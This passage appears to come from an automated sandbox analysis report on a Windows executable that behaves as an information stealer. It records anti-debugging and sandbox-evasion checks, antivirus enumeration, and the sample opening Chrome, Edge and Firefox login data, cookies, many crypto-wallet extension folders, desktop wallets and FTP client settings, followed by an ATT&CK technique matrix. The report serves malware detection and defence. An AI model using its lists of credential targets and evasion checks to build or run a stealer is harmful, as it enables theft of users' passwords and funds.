              Source: C:\Users\user\Desktop\file.exe TID: 5868Thread sleep time: -40020s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, file.exe, 00000000.00000003.1864062353.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1843571940.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, file.exe, 00000000.00000003.1864062353.0000000000DD1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1863817589.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1864062353.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1867503961.0000000000E5B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4280, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: file.exeString found in binary or memory: Wallets/Electrum-LTC
              Source: file.exeString found in binary or memory: Wallets/ElectronCash
              Source: file.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
              Source: file.exeString found in binary or memory: window-state.json
              Source: file.exe, 00000000.00000003.1843571940.0000000000DD8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: file.exeString found in binary or memory: Wallets/Exodus
              Source: file.exeString found in binary or memory: %appdata%\Ethereum
              Source: file.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exeString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1793640504.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1792814886.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1794021961.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1792784411.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1792640692.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1762884900.0000000000E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1815422252.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1762774652.0000000000E3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1816137856.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1792979649.0000000000E41000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1840994528.0000000000E40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1843571940.0000000000DD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4280, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4280, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              11
              Process Injection
              34
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              Query Registry
              Remote Services41
              Data from Local System
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading
              11
              Process Injection
              LSASS Memory751
              Security Software Discovery
              Remote Desktop ProtocolData from Removable Media11
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
              Obfuscated Files or Information
              Security Account Manager34
